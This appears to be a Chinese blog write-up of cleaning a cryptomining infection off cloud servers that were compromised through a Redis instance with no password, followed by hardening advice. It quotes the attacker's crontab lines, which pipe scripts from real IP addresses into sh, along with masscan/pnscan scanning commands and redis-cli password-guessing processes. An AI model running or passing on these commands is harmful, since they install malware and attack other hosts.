华为云阿里云因redis未设置密码中毒

1.中毒特征

有跑满100%CPU的进程notlsb notlsa


[root@ecs-s6-medium-2-linux-20191116090109 ~]# ps aux|grep notlsb
root      9710  0.0  0.0 112712   968 pts/1    S+   12:20   0:00 grep --color=auto notlsb
root     13009 48.1  0.2  39804  5420 ?        Ssl  Nov26 1149:03 ./notlsb

杀死后,发现一个pnscan进程,杀不死

[root@ecs-s6-large-2-linux-20191113142903 ~]# ps aux|grep pnscan
root      7471  3.7  0.0 9481936  928 ?        Sl   11:50   0:00 /usr/local/bin/pnscan -t512 -R 6f 73 3a 4c 69 6e 75 78 -W 2a 66 6f 0d 0a 198.234.0.0/16 6379

[root@ecs-s6-medium-2-linux-20191116090109 ~]# ps aux |grep masscan
root      6762  2.5  2.0 201960 38744 ?        Sl   12:24   0:00 masscan --max-rate 10000 -p6379 192.168.0.0/16 172.16.0.0/16 116.62.0.0/16 116.232.0.0/16 116.128.0.0/16 116.163.0.0/16

crontab -e

//"/tmp/crontab.F4Macp"
*/15 * * * * curl -fsSL 122.51.164.83:7770/ash.sh|sh

有大量redis-cli进程:

[root@ecs-s6-large-2-linux-20191113142903 redis-4.0.14]# ps -ef |grep redis-cli
root      5751 28428  0 12:13 pts/1    00:00:00 grep --color=auto redis-cli
root     22237     1  0 11:53 ?        00:00:00 redis-cli -h 103.219.179.235 -p 6379 --raw
root     22253     1  0 11:53 ?        00:00:00 redis-cli -h 103.219.179.235 -p 6379 -a 123456 --raw
root     22303     1  0 11:53 ?        00:00:00 redis-cli -h 103.40.26.42 -p 6379 -a oracle --raw
root     22305     1  0 11:53 ?        00:00:00 redis-cli -h 103.40.26.42 -p 6379 -a password --raw
root     22309     1  0 11:53 ?        00:00:00 redis-cli -h 103.40.26.42 -p 6379 -a abc123 --raw
root     22311     1  0 11:53 ?        00:00:00 redis-cli -h 103.40.26.42 -p 6379 -a abc123! --raw
root     22315     1  0 11:53 ?        00:00:00 redis-cli -h 103.40.26.42 -p 6379 -a admin --raw
root     22397     1  0 11:53 ?        00:00:00 redis-cli -h 112.29.172.234 -p 6379 --raw
root     22401     1  0 11:53 ?        00:00:00 redis-cli -h 112.29.172.234 -p 6379 -a root --raw
root     22481     1  0 11:53 ?        00:00:00 redis-cli -h 118.184.159.50 -p 6379 -a root --raw
root     22487     1  0 11:53 ?        00:00:00 redis-cli -h 118.184.159.50 -p 6379 -a p@aaw0rd --raw
root     22491     1  0 11:53 ?        00:00:00 redis-cli -h 118.184.159.50 -p 6379 -a abc123! --raw
root     22493     1  0 11:53 ?        00:00:00 redis-cli -h 118.184.159.50 -p 6379 -a 123456 --raw
root     22597     1  0 11:53 ?        00:00:00 redis-cli -h 134.220.39.193 -p 6379 --raw
root     22599     1  0 11:53 ?        00:00:00 redis-cli -h 134.220.39.193 -p 6379 -a redis --raw
root     22601     1  0 11:53 ?        00:00:00 redis-cli -h 134.220.39.193 -p 6379 -a root --raw
root     22603     1  0 11:53 ?        00:00:00 redis-cli -h 134.220.39.193 -p 6379 -a oracle --raw
root     22605     1  0 11:53 ?        00:00:00 redis-cli -h 134.220.39.193 -p 6379 -a password --raw
root     22607     1  0 11:53 ?        00:00:00 redis-cli -h 134.220.39.193 -p 6379 -a p@aaw0rd --raw
root     22609     1  0 11:53 ?        00:00:00 redis-cli -h 134.220.39.193 -p 6379 -a abc123 --raw
root     22611     1  0 11:53 ?        00:00:00 redis-cli -h 134.220.39.193 -p 6379 -a abc123! --raw
root     22614     1  0 11:53 ?        00:00:00 redis-cli -h 134.220.39.193 -p 6379 -a 123456 --raw
root     22616     1  0 11:53 ?        00:00:00 redis-cli -h 134.220.39.193 -p 6379 -a admin --raw
root     22618     1  0 11:53 ?        00:00:00 redis-cli -h 134.220.78.6 -p 6379 --raw
root     22620     1  0 11:53 ?        00:00:00 redis-cli -h 134.220.78.6 -p 6379 -a redis --raw
root     22622     1  0 11:53 ?        00:00:00 redis-cli -h 134.220.78.6 -p 6379 -a root --raw
root     22624     1  0 11:53 ?        00:00:00 redis-cli -h 134.220.78.6 -p 6379 -a oracle --raw

/bin目录下的异常文件


这几个系统命令被篡改:


计划任务在下载木马:


/tmp下的木马文件


2.原因

通过redis 目前中毒的共同点就是安装了 redis 并且没有设置密码。 有人 利用redis的漏洞。固定在去请求阿里云的内网网ip。找有3306 端口,并且没有设置密码的 ecs。然后植入病毒。

3.解决方法

  • 1)删除了 root 用户下面你的所有定时任务。
crontab -u root -r 
rm -rf /usr/bin/dpkgd (ps netstat lsof ss)
rm -rf /usr/bin/bsd-port     #木马程序
rm -f /usr/bin/.sshd         #木马后门
rm -f /tmp/gates.lod
rm -f /tmp/moni.lod
rm -f /etc/rc.d/init.d/DbSecuritySpt(启动上述描述的那些木马变种程序)
rm -f /etc/rc.d/rc1.d/S97DbSecuritySpt
rm -f /etc/rc.d/rc2.d/S97DbSecuritySpt
rm -f /etc/rc.d/rc3.d/S97DbSecuritySpt
rm -f /etc/rc.d/rc4.d/S97DbSecuritySpt
rm -f /etc/rc.d/rc5.d/S97DbSecuritySpt
rm -f /etc/rc.d/init.d/selinux(默认是启动/usr/bin/bsd-port/getty)
rm -f /etc/rc.d/rc1.d/S99selinux
rm -f /etc/rc.d/rc2.d/S99selinux
rm -f /etc/rc.d/rc3.d/S99selinux
rm -f /etc/rc.d/rc4.d/S99selinux
rm -f /etc/rc.d/rc5.d/S99selinux
  • 2)不要用 默认端口还不设置密码
    在redis.conf 中 requirepass XXX

  • 3)批量杀死redis-cli进程

ps -ef |grep redis-cli|awk '{print $2}'|xargs kill -9

第一步 top 找到kdevtmpfsi的进程号

第二步 systemctl status 进程号

可以看到 kdevtmpfsi的父进程kinsing,和进程的启动位置路径

ok,把这两个依次kill掉,并且删除它们的源文件

rm -af /var/tmp/kinsing

rm -af /tmp/kdevtmpfsi

用命令 crontab -l 查看定时任务

cd到 /var/spool/cron/ 目录下,查看redis用户

cat redis:

REDIS0009   redis-ver5.0.2
redis-bits￀㨭eLĪused-mem¨H
preamble~Q

*/1 * * * * curl -fsSL http://185.181.10.234/E5DB0E07C3D7BE80V520/init.sh |sh

cd /var/spool/cron 查看是否有相关的木马定时任务在执行(root文件里面为定时任务)有的话删掉再重启下crontab(命令:systemctl restart crond.service)

后续操作:(找到文件,全部删除,若没有则无需操作
find / -name kdevtmpfsi

find / -name kinsing

4.后续


[root@ecs-s6-large-2-linux-20191113142903 .ssh]# ps -ef|grep sshd
root      2869     1  0 Nov13 ?        00:00:06 /usr/sbin/sshd -D
root      6380     1  0 Nov29 ?        00:00:00 /usr/bin/.sshd
root     10107  2869  0 15:19 ?        00:00:00 sshd: root@pts/6
root     20048     1  0 Dec09 ?        00:00:00 /usr/bin/.sshd
root     22857  2869  0 11:41 ?        00:00:00 sshd: root@pts/3
root     22881  2869  0 11:41 ?        00:00:00 sshd: root@pts/4
root     22996  2869  0 14:18 ?        00:00:00 sshd: root@pts/0
root     23018  2869  0 14:19 ?        00:00:00 sshd: root@pts/1
root     23078  2869  0 14:48 ?        00:00:00 sshd: root@pts/2
root     23080  2869  0 14:48 ?        00:00:00 sshd: root@notty
root     23115  2869  0 14:49 ?        00:00:00 sshd: root@pts/5
root     23117  2869  0 14:49 ?        00:00:00 sshd: root@notty

/tmp下的文件无法删除:
i :设定文件不能被删除、改名、设定链接关系,同时不能写入或新增内容;对目录

[root@ecs-s6-medium-2-linux-20191116090109 tmp]# lsattr *
----i--------e-- config.json
-------------e-- conf.n
-------------e-- notlsb
----i--------e-- sysupdate
----i--------e-- tmp.WhhpNAqNIg/notlsb
----i--------e-- tmp.XZYubjPJK3/notlsa
----i--------e-- wgeta
----i--------e-- wgetb

[root@ecs-s6-medium-2-linux-20191116090109 tmp]# chattr -R -i *
[root@ecs-s6-medium-2-linux-20191116090109 tmp]# lsattr *
-------------e-- conf.n
-------------e-- tmp.WhhpNAqNIg/notlsb
-------------e-- tmp.XZYubjPJK3/notlsa

ls /usr/bin/dpkgd/ #替换的工具,系统自带的工具正常不会在这个目录下,并且也不可用

netstat lsof ps ss

/usr/bin/bsd-port #后门程序

/usr/sbin/.sshd #判断是后门程序

5.华为安全人员的给出的建议

安全排查:
初步判断主机疑似因redis未授权访问漏洞被入侵(漏洞详情可参考链接:http://www.freebuf.com/vuls/85021.html),当前主机内异常文件已暂协助客户清除,为防止黑客留有其他后门,建议客户择机重装系统,重新部署应用,并对参考安全加固建议对主机进行安全加固。

安全加固建议:
1、部署redis建议修改默认端口或者限制IP访问,开启密码认证功能,并使用强密码。
2、启动安全组白名单策略,根据业务需求对外开放端口,关闭不必要开放的端口!对于特殊业务端口,建议设置固定的来源IP(如: 6379、22)或使用VPN、堡垒机建立自己的运维通道;
3、严格控制各服务的系统权限,各服务进程请不要以root权限运行;各应用(如WEB)同数据库交互的账号同样不要使用root权限的账号;
4、设置系统所有账号口令(包括系统账户和应用账户)为符合规范的强口令;
强口令设置要求参照:https://bbs.huaweicloud.com/blogs/87a98385ec6411e79fc57ca23e93a89f
5、建议定期做好数据备份(虚拟机内部备份,异地备份,云上云下备份等),避免被加密勒索;
6、为防御主机和应用方面潜在的安全风险,保护主机不遭受进一步破坏,建议使用华为云官方提供的企业主机安全或安全专家服务:
企业主机安全服务参照:https://www.huaweicloud.com/product/hss.html
安全专家服务参照:https://www.huaweicloud.com/product/ses.html

最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 214,172评论 6 493
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 91,346评论 3 389
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 159,788评论 0 349
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 57,299评论 1 288
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 66,409评论 6 386
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 50,467评论 1 292
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 39,476评论 3 412
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 38,262评论 0 269
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 44,699评论 1 307
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 36,994评论 2 328
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 39,167评论 1 343
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 34,827评论 4 337
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 40,499评论 3 322
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 31,149评论 0 21
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 32,387评论 1 267
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 47,028评论 2 365
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 44,055评论 2 352

推荐阅读更多精彩内容

  • NOSQL类型简介键值对:会使用到一个哈希表,表中有一个特定的键和一个指针指向特定的数据,如redis,volde...
    MicoCube阅读 3,972评论 2 27
  • 安全的Redis 2015年11月,全球数万个Redis节点遭受到了攻击,所有数据都会被清除了,只有一个叫crac...
    linuxzw阅读 511评论 0 2
  • 一、Redis 简介 Redis 是完全开源免费的,遵守BSD协议,是一个高性能(NOSQL)的key-value...
    神奇作手阅读 490评论 0 1
  • Redis备案 http://www.runoob.com/redis/redis-conf.html redis...
    点点渔火阅读 504评论 0 2
  • 前言 Redis是一个高性能的key-value数据库,现时越来越多企业与应用使用Redis作为缓存服务器。楼主是...
    liangzzz阅读 4,257评论 9 152